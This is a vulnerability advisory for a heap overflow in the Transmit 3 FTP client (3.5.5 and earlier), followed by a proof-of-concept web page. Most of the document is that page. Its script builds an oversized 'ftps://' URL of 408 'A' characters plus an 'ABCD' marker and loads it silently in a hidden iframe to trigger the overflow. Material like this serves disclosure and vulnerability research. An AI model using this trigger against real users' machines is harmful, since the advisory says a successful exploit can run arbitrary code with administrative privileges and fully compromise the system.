source: https://www.securityfocus.com/bid/22145/info Transmit 3 is prone to a heap-overflow vulnerability because it fails to perform sufficient boundary checks on user-supplied data before copying it to a buffer. An attacker could leverage this issue to have arbitrary code execute with administrative privileges. A successful exploit could result in the complete compromise of the affected system. Transmit 3 version 3.5.5 and prior are reported vulnerable. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html> <head> <title>MOAB-19-01-2007</title> <script> function boom() { var recipient = document.getElementById('testbox'); var str = ''; for (var i = 0; i < 408; i++) { str = str + 'A' } str = str + 'ABCD'; alert('Payload size: ' + str.length); str = "ftps://" + str; ftarget = document.createElement('iframe'); ftarget.src = str; ftarget.width = 1; ftarget.height = 1; recipient.appendChild(ftarget); } </script> </head> <body> <div id="testbox" style="display: none;"></div> <input type="button" onclick="boom();" value="Test MOAB-19-01-2007" /> </body> </html>